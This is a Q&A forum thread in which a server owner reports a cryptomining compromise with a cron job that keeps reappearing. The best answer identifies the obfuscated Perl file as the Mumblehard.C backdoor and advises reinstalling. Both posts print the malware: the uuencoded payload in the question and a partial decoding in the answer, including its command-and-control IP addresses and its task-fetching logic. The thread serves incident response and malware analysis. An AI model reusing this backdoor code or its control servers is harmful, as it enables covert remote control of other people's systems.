Ubuntu – Bitcoin mining attack

bitcoincronscripts

I think my server has been attacked and I appreciate any help.

On the image Top process it shows strange processes.

The output of netstat -tap shows multiple:

tcp        0      1 myserver:47985            monero.crypto-pool:6666 SYN_ENVI    -

If I do: crontab -e or crontab -l it shows nothing.
Then I've found this:

sudo cat /var/spool/cron/crontabs/www-data
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/var/tmp/dflubvojhH7 installed on Mon Jan  8 21:01:29 2018)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
*/10 * * * * perl /var/tmp/dflubvojhH >/dev/null 2>&1

Checking file permissions

/var/spool/cron/crontabs# ll

-rw------- 1 ww-data       www-data     191 Jan 10 11:26 www-data

Then I've found this executable file :

ls /var/tmp/
gnqjfq

The content of the file:

$ cat /var/tmp/gnqjfq 
my $FMJJIN;$FMJJIN.=$_ while(<DATA>);eval(unpack('u*',$FMJJIN));
__DATA__
M(R$O=7-R+V)I;B]P97)L("UW"G5S92!S=')I8W0["G5S92!03U-)6#L*=7-E
M($E/.CI3;V-K970["G5S92!)3SHZ4V5L96-T.PHD,"`](")M86EL(CL@)'P@
M/2`Q.R`F;6%I;B@I.PIS=6(@;6%I;@I["F5X:70@,"!U;FQE<W,@9&5F:6YE
M9"`H;7D@)'!I9"`](&9O<FLI.PIE>&ET(#`@:68@)'!I9#L*4$]325@Z.G-E
M='-I9"@I.PHD4TE'>R1??2`]("))1TY/4D4B(&9O<B`H<7<@*$A54"!)3E0@
M24Q,($9012!154E4($%"4E0@55-2,2!314=6(%534C(@4$E012!!3%)-(%1%
M4DT@0TA,1"DI.PIU;6%S:R`P.PIC:&1I<B`B+R(["F]P96X@*%-41$E.+"`B
M/"]D978O;G5L;"(I.PIO<&5N("A35$1/550L("(^+V1E=B]N=6QL(BD["F]P
M96X@*%-41$524BP@(CXF4U1$3U54(BD["FUY("1U<FP@/2!;(C<W+C<R+C@S
M+C$S-R(L(CDS+C@X+C<T+C(T,R)=.PIM>2`D<FYD(#T@6R)A(BXN(GHB+"`B
M02(N+B):(ET[("1R;F0@/2!J;VEN("@B(BP@0"1R;F1;;6%P('MR86YD($`D
M<FYD?2@Q+BXH-B`K(&EN="!R86YD(#4I*5TI.PIM>2`D9&ER(#T@(B]V87(O
M=&UP(CL@:68@*&]P96X@*$8L("(^(BP@(B]T;7`O)')N9"(I*2![(&-L;W-E
M($8[('5N;&EN:R`B+W1M<"\D<FYD(CL@)&1I<B`](B]T;7`B.R!]"FUY("@D
M:&5A9&5R+"`D8V]N=&5N="D["FUY("@D;&EN:RP@)&9I;&4L("1I9"P@)&-O
M;6UA;F0L("1T:6UE;W5T*2`]("@B96XN=VEK:7!E9&EA+F]R9R(L(")I;F1E
M>"YH=&UL(BP@,2P@.38L(#$P*3L*9F]R96%C:"!M>2`D<G,@*$`D=7)L*0I[
M"B1H96%D97(@/2`B)&1I<B\B("X@=&EM93L@)&-O;G1E;G0@/2`D:&5A9&5R
M("X@(C$B.PIU;FQI;FL@)&AE861E<B!I9B`M9B`D:&5A9&5R.R!U;FQI;FL@
M)&-O;G1E;G0@:68@+68@)&-O;G1E;G0["B9H='1P*"1R<RP@)'1I;65O=70L
M("1H96%D97(L("1C;VYT96YT+"`P*3L*:68@*&]P96X@*$8L("(\(BP@)&AE
M861E<BDI"GL*9FQO8VL@1BP@,3L*;7D@*"1T97-T+"`D=&%S:RD@/2`H,"P@
M(B(I.PIW:&EL92`H/$8^*0I["G,O7EQS*BA;7EQS73\N*BDD+R0Q+SL*<R]>
M*"XJ6UY<<UTI7',J)"\D,2\["FYE>'0@=6YL97-S(&QE;F=T:"`D7SL*)'1E
M<W0@*RL@:68@)%\@97$@(DA45%`O,2XP(#(P,"!/2R(@?'P@)%\@97$@(D-O
M;FYE8W1I;VXZ(&-L;W-E(CL@)'1A<VL@/2`D,2!I9B`O7E-E="U#;V]K:64Z
M(%!(4%-%4U-)1#TH6UX[72LI+SL*?0IC;&]S92!&.PHH)&QI;FLL("1F:6QE
M+"`D:60L("1C;VUM86YD+"`D=&EM96]U="D@/2`F9&5C>&0H)'1A<VLI(&EF
M("1T97-T(#T](#(@)B8@;&5N9W1H("1T87-K.PI]"G5N;&EN:R`D:&5A9&5R
M(&EF("UF("1H96%D97([('5N;&EN:R`D8V]N=&5N="!I9B`M9B`D8V]N=&5N
...

I've tried this:

  1. Comment the cron line: Didn't work, It creates a new cron
  2. Delete cron file www-data: Didn't work, It creates a new cron file
  3. Delete cron line and change owner/group to root: Didn't work. I don't know how he do it but after 2 days he started to work again but the cron keeps empty and with the root owner.

Best Answer

This appears to be the payload from the Mumblehard.C backdoor. This file allows arbitrary code execution from the control servers listed in the file and would be able to execute with the permissions of the www-data user.

I would certainly backup your data and reinstall however the scope of this backdoor should only be the www-data user and was likely due to an out of date WordPress installation.

It's intentionally making it hard to kill. You can instead kill all processes running under the www-data user if you need to try to mitigate it while the system is still running.

The file in /var/tmp is a perl script that encodes another perl script using uuencode format. You didn't include the whole thing but here's what it looks like as plain text so far:

#!/usr/bin/perl -w
use strict;
use POSIX;
use IO::Socket;
use IO::Select;
$0 = "mail"; $| = 1; &main();
sub main
{
exit 0 unless defined (my $pid = fork);
exit 0 if $pid;
POSIX::setsid();
$SIG{$_} = "IGNORE" for (qw (HUP INT ILL FPE QUIT ABRT USR1 SEGV USR2 PIPE ALRM TERM CHLD));
umask 0;
chdir "/";
open (STDIN, "</dev/null");
open (STDOUT, ">/dev/null");
open (STDERR, ">&STDOUT");
my $url = ["77.72.83.137","93.88.74.243"];
my $rnd = ["a".."z", "A".."Z"]; $rnd = join ("", @$rnd[map {rand @$rnd}(1..(6 + int rand 5))]);
my $dir = "/var/tmp"; if (open (F, ">", "/tmp/$rnd")) { close F; unlink "/tmp/$rnd"; $dir ="/tmp"; }
my ($header, $content);
my ($link, $file, $id, $command, $timeout) = ("en.wikipedia.org", "index.html", 1, 96, 10);
foreach my $rs (@$url)
{
$header = "$dir/" . time; $content = $header . "1";
unlink $header if -f $header; unlink $content if -f $content;
&http($rs, $timeout, $header, $content, 0);
if (open (F, "<", $header))
{
flock F, 1;
my ($test, $task) = (0, "");
while (<F>)
{
s/^\s*([^\s]?.*)$/$1/;
s/^(.*[^\s])\s*$/$1/;
next unless length $_;
$test ++ if $_ eq "HTTP/1.0 200 OK" || $_ eq "Connection: close"; $task = $1 if /^Set-Cookie: PHPSESSID=([^;]+)/;
}
close F;
($link, $file, $id, $command, $timeout) = &decxd($task) if $test == 2 && length $task;
}
unlink $header if -f $header; unlink $content if -f $conten

This appears to closely parallel the code from here:

http://hardwarefetish.com/681-mumblehard-c-trojan-unpacked

Where 77.72.83.137 and 93.88.74.243 are the control servers. Both these IPs are registered in Russia and are for VPSs. One of the IPs are listed for spam activity:

https://mxtoolbox.com/SuperTool.aspx?action=blacklist%3a93.88.74.243&run=toolpage

As these IPs get indexed in search engines expect the attacker to disable them automatically. Although I doubt it much matters since the VPSs aren't going to help you out legally anyway.

Related Question